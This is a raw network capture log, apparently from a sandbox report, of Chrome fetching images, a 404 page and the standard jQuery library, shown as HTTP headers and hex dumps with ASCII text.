2025-01-16 00:33:00 UTC	16384	IN	Data Raw: 06 15 30 ce 26 fd 80 69 00 09 a4 0c 34 c4 e0 aa 65 80 05 10 2b 22 fe c4 40 5a 12 86 9f 0d 66 3c 28 63 20 c5 d1 9f 01 2a 4f 72 80 13 83 2c 35 12 66 b4 bc 19 a0 75 23 13 37 7d c3 99 d0 20 79 a4 14 2f 45 fc 96 53 c1 c5 cb 19 8f 2a b8 3c 41 ec 8e 05 9b 24 39 34 f2 a0 7a 22 03 f1 7b 64 0c df 28 63 91 00 79 12 09 cc 30 8e 67 c0 08 92 04 66 23 1a d0 5c 63 03 86 81 64 d0 9f 79 82 19 f2 c1 46 23 d0 e7 c7 7d 1a 61 70 88 76 13 29 d0 de 21 31 68 96 10 7a 83 48 60 a1 3f 27 30 65 ff cc 06 13 11 00 60 20 03 7c 95 50 6e 8c 18 00 1e 42 0d 28 a8 c7 63 12 b5 f0 c8 00 17 4c 34 42 20 12 4c 64 42 24 9e 4d 44 d6 1f b7 21 84 61 24 57 9d f8 07 0a 12 ed 58 49 08 12 b1 c5 87 01 8b f5 73 a3 25 03 ac 48 0f 03 2e ce 51 24 45 99 18 60 62 3f 2a ec 51 42 42 2b 64 09 89 00 d8 f8 43 40 81 Data Ascii: 0&i4e+"@Zf<(c Or,5fu#7} y/ES<A$94z"{d(cy0gf#\cdyF#}apv)!1hzH`?'0e` \|PnB(cL4B LdB$MD!a$WXIs%H.Q$E`b?*QBB+dC@
2025-01-16 00:33:00 UTC	5608	IN	Data Raw: 08 bc 00 2e 7e 11 46 07 e8 f9 c2 a6 3a f5 a9 50 8d aa 54 a7 4a d5 aa 5a f5 aa 58 cd aa 56 b7 ca d5 ae 7a f5 ab 60 0d 2b 20 82 00 00 21 f9 04 09 03 00 00 00 2c 00 00 00 00 c8 00 c8 00 85 00 00 00 b5 b5 b5 f5 f5 f5 fd fd fd 9d 9d 9d f7 f7 f7 fb fb fb 99 99 99 9b 9b 9b ff ff ff a1 a1 a1 9f 9f 9f a5 a5 a5 ad ad ad c9 c9 c9 ed ed ed a3 a3 a3 f9 f9 f9 f3 f3 f3 df df df d1 d1 d1 e1 e1 e1 e9 e9 e9 b9 b9 b9 bd bd bd ef ef ef c3 c3 c3 a9 a9 a9 db db db eb eb eb e7 e7 e7 c7 c7 c7 cf cf cf c1 c1 c1 bb bb bb cb cb cb bf bf bf f1 f1 f1 d5 d5 d5 ab ab ab dd dd dd d9 d9 d9 d3 d3 d3 b3 b3 b3 af af af c5 c5 c5 b1 b1 b1 a7 a7 a7 b7 b7 b7 e3 e3 e3 e5 e5 e5 cd cd cd d7 d7 d7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 Data Ascii: .~F:PTJZXVz`+ !,
2025-01-16 00:33:00 UTC	16384	IN	Data Raw: dd dd d9 d9 d9 d3 d3 d3 b3 b3 b3 af af af c5 c5 c5 b1 b1 b1 a7 a7 a7 b7 b7 b7 e3 e3 e3 e5 e5 e5 cd cd cd d7 d7 d7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 ff 40 80 70 48 2c 1a 8f c8 a4 72 c9 6c 3a 9f d0 a8 74 4a ad 5a af d8 ac 76 cb ed 7a bf e0 b0 78 4c 2e 9b cf e8 b4 7a cd 6e bb df f0 b8 7c 4e af db ef f8 bc 7e cf ef fb ff 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97 98 99 93 25 32 29 33 24 2b 0d 1b 0c 0a 04 07 07 0b 10 1b 0d 30 1a 20 28 16 05 9a 92 1d 26 21 27 a7 b9 ba bb bc ba 08 2f 30 20 32 06 b3 87 1e 23 0d bd ca cb cc 07 0d 1a 29 25 c5 7e 05 1c 22 0b cd d9 da bc 0c 2d 1e d3 7a 2d db e3 e4 b9 0a 21 15 03 e0 75 1e e5 ee e4 0b 1f 12 eb 72 03 0a ef f8 db 30 31 f4 70 Data Ascii: @pH,rl:tJZvzxL.zn\|N~%2)3$+0 (&!'/0 2#)%~"-z-!ur01p
2025-01-16 00:33:00 UTC	442	IN	Data Raw: 28 81 09 43 b2 80 e8 29 62 2d 5e 59 80 0a 8a e8 06 03 e8 8f 28 08 90 21 23 ca e2 95 17 54 80 0e 11 98 01 0c 4f 72 b4 46 e4 ff d0 2b 07 70 c1 b5 dc 00 8d d3 cd a4 85 8d 70 1d 1e 5d 40 83 08 8e c1 17 c7 f3 0a ee 26 21 3b 3c 22 00 03 51 29 83 05 34 80 44 3c 2e 72 12 03 00 12 1e 73 a1 80 a3 7c 21 02 1c 08 41 46 36 09 0b d6 59 82 25 a4 cc 05 04 2e 00 02 19 18 d2 09 12 88 c1 07 30 96 4a 58 00 ec 12 6c ac 65 2e 4e a0 81 19 a8 80 03 15 f0 c0 03 24 90 8a 08 08 a0 04 0f b0 80 0c 52 30 02 11 9c 80 8a 4d 41 40 1d 31 21 03 3f ea f2 9a 2d 21 80 1a 37 f1 80 39 62 f3 9b fe 50 c0 1e 43 21 80 2d 82 f3 9c db 60 81 06 45 81 37 74 ba 73 1a 0e 20 23 27 3a 30 ca 77 da f3 2b 6f 6c 87 01 34 79 cf 77 9e c0 8b ed 40 81 35 fb 49 4a fc ed 43 00 fc 24 68 2d 4f 80 30 8b 58 80 96 0a b5 Data Ascii: (C)b-^Y(!#TOrF+pp]@&!;<"Q)4D<.rs\|!AF6Y%.0JXle.N$R0MA@1!?-!79bPC!-`E7ts #':0w+ol4yw@5IJC$h-O0X

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49743	208.91.114.103	443	3180	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-16 00:33:00 UTC	639	OUT	GET /customviews/image/password_hidden:93edf7d3ceb704be92ee084ecc62c6c8/ HTTP/1.1 Host: fac.corp.fortinet.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ipfs.io/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-16 00:33:00 UTC	548	IN	HTTP/1.1 404 Not Found Date: Thu, 16 Jan 2025 00:33:00 GMT Content-Length: 4288 Content-Security-Policy: object-src 'none'; base-uri 'self'; default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline' X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Content-Language: en X-Content-Type-Options: nosniff Referrer-Policy: strict-origin-when-cross-origin Cache-Control: public, max-age=31536000 X-XSS-Protection: 1; mode=block Permissions-Policy: fullscreen=(self) Connection: close Content-Type: text/html; charset=utf-8
2025-01-16 00:33:00 UTC	4288	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 73 74 72 69 63 74 2d 6f 72 69 67 69 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 73 69 74 65 5f 6d 65 64 69 61 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f Data Ascii: <!DOCTYPE html><html><head> <meta http-equiv="Content-type" content="text/html; charset=UTF-8"> <meta name="referrer" content="strict-origin"> <title>Not Found</title> <link rel="stylesheet" type="text/css" href="/site_media/css/font-aweso

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49746	151.101.2.137	443	3180	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-16 00:33:00 UTC	358	OUT	GET /jquery-2.2.4.min.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-16 00:33:00 UTC	615	IN	HTTP/1.1 200 OK Connection: close Content-Length: 85578 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-14e4a" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Via: 1.1 varnish, 1.1 varnish Accept-Ranges: bytes Date: Thu, 16 Jan 2025 00:33:00 GMT Age: 2479151 X-Served-By: cache-lga21935-LGA, cache-ewr-kewr1740061-EWR X-Cache: HIT, HIT X-Cache-Hits: 2413, 120 X-Timer: S1736987581.896249,VS0,VE0 Vary: Accept-Encoding
2025-01-16 00:33:00 UTC	1378	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 32 2e 32 2e 34 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 69 74 68 20 61 20 64 6f 63 75 6d 65 6e Data Ascii: /! jQuery v2.2.4 \| (c) jQuery Foundation \| jquery.org/license /!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a documen
2025-01-16 00:33:00 UTC	1378	IN	Data Raw: 2c 63 2c 64 2c 65 2c 66 2c 67 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 7c 7c 7b 7d 2c 68 3d 31 2c 69 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 6a 3d 21 31 3b 66 6f 72 28 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20 67 26 26 28 6a 3d 67 2c 67 3d 61 72 67 75 6d 65 6e 74 73 5b 68 5d 7c 7c 7b 7d 2c 68 2b 2b 29 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 7c 7c 6e 2e 69 73 46 75 6e 63 74 69 6f 6e 28 67 29 7c 7c 28 67 3d 7b 7d 29 2c 68 3d 3d 3d 69 26 26 28 67 3d 74 68 69 73 2c 68 2d 2d 29 3b 69 3e 68 3b 68 2b 2b 29 69 66 28 6e 75 6c 6c 21 3d 28 61 3d 61 72 67 75 6d 65 6e 74 73 5b 68 5d 29 29 66 6f 72 28 62 20 69 6e 20 61 29 63 3d 67 5b 62 5d 2c 64 3d 61 5b 62 5d 2c 67 21 3d 3d 64 26 26 28 6a 26 26 64 26 26 28 6e 2e 69 73 50 6c 61 Data Ascii: ,c,d,e,f,g=arguments[0]\|\|{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments[h]\|\|{},h++),"object"==typeof g\|\|n.isFunction(g)\|\|(g={}),h===i&&(g=this,h--);i>h;h++)if(null!=(a=arguments[h]))for(b in a)c=g[b],d=a[b],g!==d&&(j&&d&&(n.isPla
2025-01-16 00:33:00 UTC	1378	IN	Data Raw: 2d 22 29 2e 72 65 70 6c 61 63 65 28 71 2c 72 29 7d 2c 6e 6f 64 65 4e 61 6d 65 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 2e 6e 6f 64 65 4e 61 6d 65 26 26 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 2c 64 3d 30 3b 69 66 28 73 28 61 29 29 7b 66 6f 72 28 63 3d 61 2e 6c 65 6e 67 74 68 3b 63 3e 64 3b 64 2b 2b 29 69 66 28 62 2e 63 61 6c 6c 28 61 5b 64 5d 2c 64 2c 61 5b 64 5d 29 3d 3d 3d 21 31 29 62 72 65 61 6b 7d 65 6c 73 65 20 66 6f 72 28 64 20 69 6e 20 61 29 69 66 28 62 2e 63 61 6c 6c 28 61 5b 64 5d 2c 64 2c 61 5b 64 5d 29 3d 3d 3d 21 31 29 62 72 65 61 6b 3b 72 65 74 75 72 6e Data Ascii: -").replace(q,r)},nodeName:function(a,b){return a.nodeName&&a.nodeName.toLowerCase()===b.toLowerCase()},each:function(a,b){var c,d=0;if(s(a)){for(c=a.length;c>d;d++)if(b.call(a[d],d,a[d])===!1)break}else for(d in a)if(b.call(a[d],d,a[d])===!1)break;return
2025-01-16 00:33:00 UTC	1378	IN	Data Raw: 3d 6e 2e 74 79 70 65 28 61 29 3b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 63 7c 7c 6e 2e 69 73 57 69 6e 64 6f 77 28 61 29 3f 21 31 3a 22 61 72 72 61 79 22 3d 3d 3d 63 7c 7c 30 3d 3d 3d 62 7c 7c 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 62 26 26 62 3e 30 26 26 62 2d 31 20 69 6e 20 61 7d 76 61 72 20 74 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 70 2c 71 2c 72 2c 73 2c 74 2c 75 3d 22 73 69 7a 7a 6c 65 22 2b 31 2a 6e 65 77 20 44 61 74 65 2c 76 3d 61 2e 64 6f 63 75 6d 65 6e 74 2c 77 3d 30 2c 78 3d 30 2c 79 3d 67 61 28 29 2c 7a 3d 67 61 28 29 2c 41 3d 67 61 28 29 2c 42 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 3d 3d 3d Data Ascii: =n.type(a);return"function"===c\|\|n.isWindow(a)?!1:"array"===c\|\|0===b\|\|"number"==typeof b&&b>0&&b-1 in a}var t=function(a){var b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u="sizzle"+1*new Date,v=a.document,w=0,x=0,y=ga(),z=ga(),A=ga(),B=function(a,b){return a===
2025-01-16 00:33:00 UTC	1378	IN	Data Raw: 69 22 29 2c 62 6f 6f 6c 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 3f 3a 22 2b 4b 2b 22 29 24 22 2c 22 69 22 29 2c 6e 65 65 64 73 43 6f 6e 74 65 78 74 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4c 2b 22 2a 5b 3e 2b 7e 5d 7c 3a 28 65 76 65 6e 7c 6f 64 64 7c 65 71 7c 67 74 7c 6c 74 7c 6e 74 68 7c 66 69 72 73 74 7c 6c 61 73 74 29 28 3f 3a 5c 5c 28 22 2b 4c 2b 22 2a 28 28 3f 3a 2d 5c 5c 64 29 3f 5c 5c 64 2a 29 22 2b 4c 2b 22 2a 5c 5c 29 7c 29 28 3f 3d 5b 5e 2d 5d 7c 24 29 22 2c 22 69 22 29 7d 2c 58 3d 2f 5e 28 3f 3a 69 6e 70 75 74 7c 73 65 6c 65 63 74 7c 74 65 78 74 61 72 65 61 7c 62 75 74 74 6f 6e 29 24 2f 69 2c 59 3d 2f 5e 68 5c 64 24 2f 69 2c 5a 3d 2f 5e 5b 5e 7b 5d 2b 5c 7b 5c 73 2a 5c 5b 6e 61 74 69 76 65 20 5c 77 2f 2c 24 3d 2f 5e 28 3f 3a 23 28 Data Ascii: i"),bool:new RegExp("^(?:"+K+")$","i"),needsContext:new RegExp("^"+L+"[>+~]\|:(even\|odd\|eq\|gt\|lt\|nth\|first\|last)(?:\$"+L+"((?:-\\d)?\\d)"+L+"\$\|)(?=[^-]\|$)","i")},X=/^(?:input\|select\|textarea\|button)$/i,Y=/^h\d$/i,Z=/^[^{]+\{\s*\[native \w/,$=/^(?:#(
2025-01-16 00:33:00 UTC	1378	IN	Data Raw: 43 61 73 65 28 29 29 7b 28 6b 3d 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 6b 3d 6b 2e 72 65 70 6c 61 63 65 28 61 61 2c 22 5c 5c 24 26 22 29 3a 62 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 6b 3d 75 29 2c 72 3d 67 28 61 29 2c 68 3d 72 2e 6c 65 6e 67 74 68 2c 6c 3d 56 2e 74 65 73 74 28 6b 29 3f 22 23 22 2b 6b 3a 22 5b 69 64 3d 27 22 2b 6b 2b 22 27 5d 22 3b 77 68 69 6c 65 28 68 2d 2d 29 72 5b 68 5d 3d 6c 2b 22 20 22 2b 71 61 28 72 5b 68 5d 29 3b 73 3d 72 2e 6a 6f 69 6e 28 22 2c 22 29 2c 77 3d 5f 2e 74 65 73 74 28 61 29 26 26 6f 61 28 62 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 62 7d 69 66 28 73 29 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 64 2c 77 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 73 Data Ascii: Case()){(k=b.getAttribute("id"))?k=k.replace(aa,"\\$&"):b.setAttribute("id",k=u),r=g(a),h=r.length,l=V.test(k)?"#"+k:"[id='"+k+"']";while(h--)r[h]=l+" "+qa(r[h]);s=r.join(","),w=_.test(a)&&oa(b.parentNode)\|\|b}if(s)try{return H.apply(d,w.querySelectorAll(s
2025-01-16 00:33:00 UTC	1378	IN	Data Raw: 29 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3b 72 65 74 75 72 6e 20 62 3f 22 48 54 4d 4c 22 21 3d 3d 62 2e 6e 6f 64 65 4e 61 6d 65 3a 21 31 7d 2c 6d 3d 66 61 2e 73 65 74 44 6f 63 75 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 2c 65 2c 67 3d 61 3f 61 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 61 3a 76 3b 72 65 74 75 72 6e 20 67 21 3d 3d 6e 26 26 39 3d 3d 3d 67 2e 6e 6f 64 65 54 79 70 65 26 26 67 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3f 28 6e 3d 67 2c 6f 3d 6e 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 70 3d 21 66 28 6e 29 2c 28 65 3d 6e 2e 64 65 66 61 75 6c 74 56 69 65 77 29 26 26 65 2e 74 6f 70 21 3d 3d 65 26 26 28 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 65 2e 61 64 64 45 76 65 6e 74 4c Data Ascii: ).documentElement;return b?"HTML"!==b.nodeName:!1},m=fa.setDocument=function(a){var b,e,g=a?a.ownerDocument\|\|a:v;return g!==n&&9===g.nodeType&&g.documentElement?(n=g,o=n.documentElement,p=!f(n),(e=n.defaultView)&&e.top!==e&&(e.addEventListener?e.addEventL
2025-01-16 00:33:00 UTC	1378	IN	Data Raw: 6e 20 66 7d 2c 64 2e 66 69 6e 64 2e 43 4c 41 53 53 3d 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 26 26 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 26 26 70 3f 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 61 29 3a 76 6f 69 64 20 30 7d 2c 72 3d 5b 5d 2c 71 3d 5b 5d 2c 28 63 2e 71 73 61 3d 5a 2e 74 65 73 74 28 6e 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 29 29 26 26 28 69 61 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 6f 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 69 64 3d 27 22 2b 75 2b 22 27 3e 3c 2f 61 Data Ascii: n f},d.find.CLASS=c.getElementsByClassName&&function(a,b){return"undefined"!=typeof b.getElementsByClassName&&p?b.getElementsByClassName(a):void 0},r=[],q=[],(c.qsa=Z.test(n.querySelectorAll))&&(ia(function(a){o.appendChild(a).innerHTML="<a id='"+u+"'></a
2025-01-16 00:33:00 UTC	1378	IN	Data Raw: 6d 65 6e 74 3a 61 2c 64 3d 62 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 61 3d 3d 3d 64 7c 7c 21 28 21 64 7c 7c 31 21 3d 3d 64 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 28 63 2e 63 6f 6e 74 61 69 6e 73 3f 63 2e 63 6f 6e 74 61 69 6e 73 28 64 29 3a 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 26 26 31 36 26 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 64 29 29 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 62 29 77 68 69 6c 65 28 62 3d 62 2e 70 61 72 65 6e 74 4e 6f 64 65 29 69 66 28 62 3d 3d 3d 61 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 42 3d 62 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 3d 3d 3d 62 29 72 65 74 75 72 6e 20 6c 3d 21 Data Ascii: ment:a,d=b&&b.parentNode;return a===d\|\|!(!d\|\|1!==d.nodeType\|\|!(c.contains?c.contains(d):a.compareDocumentPosition&&16&a.compareDocumentPosition(d)))}:function(a,b){if(b)while(b=b.parentNode)if(b===a)return!0;return!1},B=b?function(a,b){if(a===b)return l=!
2025-01-16 00:33:00 UTC	1378	IN	Data Raw: 72 48 61 6e 64 6c 65 5b 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 2c 66 3d 65 26 26 44 2e 63 61 6c 6c 28 64 2e 61 74 74 72 48 61 6e 64 6c 65 2c 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3f 65 28 61 2c 62 2c 21 70 29 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 3d 66 3f 66 3a 63 2e 61 74 74 72 69 62 75 74 65 73 7c 7c 21 70 3f 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 62 29 3a 28 66 3d 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 62 29 29 26 26 66 2e 73 70 65 63 69 66 69 65 64 3f 66 2e 76 61 6c 75 65 3a 6e 75 6c 6c 7d 2c 66 61 2e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 53 79 6e 74 61 78 20 65 72 72 6f 72 2c 20 75 6e 72 65 63 6f 67 6e 69 7a 65 Data Ascii: rHandle[b.toLowerCase()],f=e&&D.call(d.attrHandle,b.toLowerCase())?e(a,b,!p):void 0;return void 0!==f?f:c.attributes\|\|!p?a.getAttribute(b):(f=a.getAttributeNode(b))&&f.specified?f.value:null},fa.error=function(a){throw new Error("Syntax error, unrecognize

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49747	65.9.66.13	443	3180	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-16 00:33:01 UTC	384	OUT	GET /escrowmade/Rolling-1s-200px__1__trHCWXy9jD.gif HTTP/1.1 Host: ik.imagekit.io Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-16 00:33:01 UTC	805	IN	HTTP/1.1 200 OK Content-Type: image/gif Content-Length: 55202 Connection: close access-control-allow-origin: * access-control-allow-methods: GET access-control-allow-headers: * timing-allow-origin: * x-server: ImageKit.io x-request-id: 77f56fe4-746b-47c7-81b6-47a394580022 Cache-Control: public, s-maxage=31536000, max-age=31536000, must-revalidate ETag: "d536d58ea2f4cfe5d5b734e7893fb09e" Last-Modified: Thu, 31 Oct 2024 20:27:09 GMT Date: Wed, 15 Jan 2025 12:13:19 GMT Via: 1.1 e75bff6012758ccb55ff41b176b32342.cloudfront.net (CloudFront), 1.1 7e513424eee237ee26467e8fd5656ec0.cloudfront.net (CloudFront) Vary: Accept X-Cache: Hit from cloudfront X-Amz-Cf-Pop: FRA56-C1 Alt-Svc: h3=":443"; ma=86400 X-Amz-Cf-Id: ljm6e1XG3llOtzph-JSVNlS1PeBGVEyOhxZRtA1kc8x_sKAkBtReig== Age: 44382
2025-01-16 00:33:01 UTC	16384	IN	Data Raw: 47 49 46 38 39 61 c8 00 c8 00 82 00 00 00 00 00 99 99 99 cb cb cb b3 b3 b3 e5 e5 e5 00 00 00 00 00 00 00 00 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 f9 04 09 03 00 00 00 2c 00 00 00 00 c8 00 c8 00 00 03 ff 08 ba dc fe 30 ca 49 ab bd 38 eb cd bb ff 60 28 8e 64 69 9e 68 aa ae 6c eb be 70 2c cf 74 6d df 78 ae ef 7c ef ff c0 a0 70 48 2c 1a 8f c8 a4 72 c9 6c 3a 9f d0 a8 74 4a ad 5a af d8 ac 76 cb ed 7a bf e0 30 97 20 28 0b 06 e8 41 20 20 10 bb 15 65 f5 7a 4e 9f b7 df dd 78 7d cf bf e3 b1 65 7c 82 7d 7f 56 81 83 88 75 7e 85 4f 87 89 8f 76 8c 8d 90 94 74 8b 92 48 02 95 9b 6b 97 98 44 9a 9c 9c 9e 9f 40 a1 a2 a3 a5 43 a7 a8 a9 aa 3f ac ad ae af 3c b1 b2 9b a4 b4 34 b6 b7 b8 ba 39 bc bd 95 b9 bf 2e c1 c2 c3 c5 bb c8 bd c4 ca 29 c7 cc 94 ce cf Data Ascii: GIF89a!NETSCAPE2.0!,0I8`(dihlp,tmx\|pH,rl:tJZvz0 (A ezNx}e\|}Vu~OvtHkD@C?<49.)
